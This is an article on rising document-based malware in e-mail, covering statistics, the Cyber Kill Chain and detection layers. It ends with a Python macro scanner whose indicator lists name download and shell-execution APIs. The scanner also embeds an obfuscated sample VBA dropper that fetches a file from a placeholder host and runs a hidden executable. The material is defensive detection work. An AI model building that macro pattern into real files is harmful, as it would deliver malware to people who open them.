Barracuda Networks researchers have uncovered an alarming new rise in the use of document-based malware. A recent e-mail analysis revealed that 48% of all malicious files detected in the last 12 months were some kind of document. More than 300,000 unique malicious documents were identified.
Since the beginning of 2019, however, these types of document-based attacks have increased in frequency and dramatically so. In the first quarter of the year, 59% of all malicious files detected were documents compared to 41% in 2018.
Cyber criminals use e-mail to deliver a document containing malicious software, also known as malware. Typically, either the malware is hidden directly in the document itself or an embedded script downloads it from an external website. Common types of malware include viruses, trojans, spyware, worms and ransomware.
After decades of relying on signature-based methods, which could only be effective at stopping a malware strain once a signature was derived from it, security companies now think about malware detection by asking the question: “What makes something malicious?” rather than: “How do I detect things I know are malicious?” The focus is on attempting to detect indicators that a file might do harm before it’s labelled as being harmful.
The Cyber Kill Chain
A common model used to better understand attacks is the Cyber Kill Chain, a seven-phase model of the steps most attackers take to breach a system:
* Reconnaissance: Target selection and research
* Weaponisation: Crafting the attack on the target, often using malware and/or exploits
* Delivery: Launching the attack
* Exploitation: Using exploits delivered in the attack package
* Installation: Creating persistence within the target’s system
* Command and Control: Using the persistence from outside the network
* Actions on objective: Achieving the objective that was the purpose of the attack (often exfiltration of data)
Most malware is sent as spam to widely circulated e-mail lists that are sold, traded, aggregated and revised as they move through the dark web. Combo lists like those used in the ongoing sextortion scams are a good example of this sort of list aggregation and usage in action.
Now that the attacker has a list of potential victims, the malware campaign (i.e. the delivery phase of the Cyber Kill Chain) can commence, using social engineering to entice users to open an attached malicious document. Microsoft and Adobe file types are the most commonly used in document-based malware attacks, including Word, Excel, PowerPoint, Acrobat and PDF files.
Once the document is opened, either the malware is installed automatically or a heavily obfuscated macro/script is used to download and install it from an external source. Occasionally, a link or other clickable item is used, but that approach is much more common in phishing attacks than in malware attacks. The executable being downloaded and run when the malicious document is opened represents the installation phase of the Cyber Kill Chain.
Archive files and script files are the other two most common attachment-based distribution methods for malware. Attackers often play tricks with file extensions to try to confuse users and cajole them into opening malicious documents.
Detection and blocking
Modern malware attacks are complex and layered, as are the solutions designed to detect and block them.
* Blacklists: With IP space becoming increasingly limited, spammers are using their own infrastructure. Often, the same IPs are used long enough for software to detect and blacklist them. Even with hacked sites and botnets, it’s possible to temporarily block attacks by IP once a large enough volume of spam has been detected.
* Spam filters/phishing detection systems: While many malicious e-mails appear convincing, spam filters, phishing detection systems and related security software can pick up subtle clues and help to block potentially threatening messages and attachments from reaching e-mail inboxes.
* Malware detection: For e-mails with malicious documents attached, both static and dynamic analysis can pick up on indicators that the document is trying to download and run an executable, which no document should ever be doing. The URL for the executable can often be flagged using heuristics or threat intelligence systems. Obfuscation detected by static analysis can also indicate whether a document may be suspicious.
* Advanced firewall: If a user opens a malicious attachment or clicks a link to a drive-by download, an advanced network firewall capable of malware analysis provides a chance to stop the attack by flagging the executable as it tries to pass through.
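To illustrate the static-analysis side of the malware detection point above (download-and-run indicators, URL extraction and obfuscation flags on a document macro), here is an added example written for this article; it is not Barracuda code. The indicator lists, the de-obfuscation passes and the two VBA samples are all constructed for the example, and the scan is a heuristic triage step, not a complete detector.

```python
import re

# Indicator lists are constructed for this example, not a vendor ruleset.
AUTOEXEC = ("AutoOpen", "Document_Open", "Workbook_Open", "Auto_Open")
DOWNLOAD = ("URLDownloadToFile", "XMLHTTP", "WinHttp", "InternetOpen", "http://", "https://")
EXECUTE = ("Shell ", "Shell(", "WScript.Shell", "CreateObject(", "powershell", "cmd.exe")
OBFUSCATION = ("Chr(", "ChrW(", "StrReverse(", "Xor ")

def deobfuscate(vba: str) -> str:
    """Undo the cheapest macro tricks: Chr(n) literals (printable ASCII only),
    StrReverse("...") literals, and "a" & "b" string splicing."""
    s = re.sub(r"ChrW?\((\d+)\)", lambda m: '"%s"' % chr(int(m.group(1))), vba, flags=re.I)
    s = re.sub(r'StrReverse\("([^"]*)"\)', lambda m: '"%s"' % m.group(1)[::-1], s, flags=re.I)
    return re.sub(r'"\s*&\s*"', "", s)

def scan_macro(vba: str) -> dict:
    """Static scan of VBA source: download/execute indicators are matched on the
    de-obfuscated text, obfuscation constructs on the raw text."""
    clean, raw = deobfuscate(vba).lower(), vba.lower()
    rep = {
        "autoexec": [k for k in AUTOEXEC if k.lower() in clean],
        "download": [k for k in DOWNLOAD if k.lower() in clean],
        "execute": [k for k in EXECUTE if k.lower() in clean],
        "obfuscation": [k for k in OBFUSCATION if k.lower() in raw],
        "urls": re.findall(r"https?://[^\s\"']+", clean),   # candidates for threat-intel lookup
    }
    if vba.count("&") > 20:                       # heavy string splicing
        rep["obfuscation"].append("string-concat")
    if rep["download"] and rep["execute"]:
        rep["verdict"] = "download-and-run"       # no document should ever do this
    elif rep["autoexec"] and rep["obfuscation"]:
        rep["verdict"] = "suspicious"
    else:
        rep["verdict"] = "clean"
    return rep

# Constructed samples: an inert dropper-style skeleton (unresolvable host) and an
# ordinary spreadsheet formatting macro.
SUSPICIOUS_MACRO = '''Sub AutoOpen()
    Set h = CreateObject(StrReverse("PTTHLMX.2LMXSM"))
    h.Open "GET", Chr(104) & "ttp://example.invalid/update.bin", False
    Shell Environ("TEMP") & "\\update.exe", vbHide
End Sub'''
BENIGN_MACRO = '''Sub FormatReport()
    Range("A1:D1").Font.Bold = True
    Columns("A:D").AutoFit
End Sub'''

print(scan_macro(SUSPICIOUS_MACRO)["verdict"], scan_macro(BENIGN_MACRO)["verdict"])
```

Without the de-obfuscation pass the reversed object name and the spliced URL in the first sample would match nothing, which is exactly why obfuscation itself is treated as an indicator.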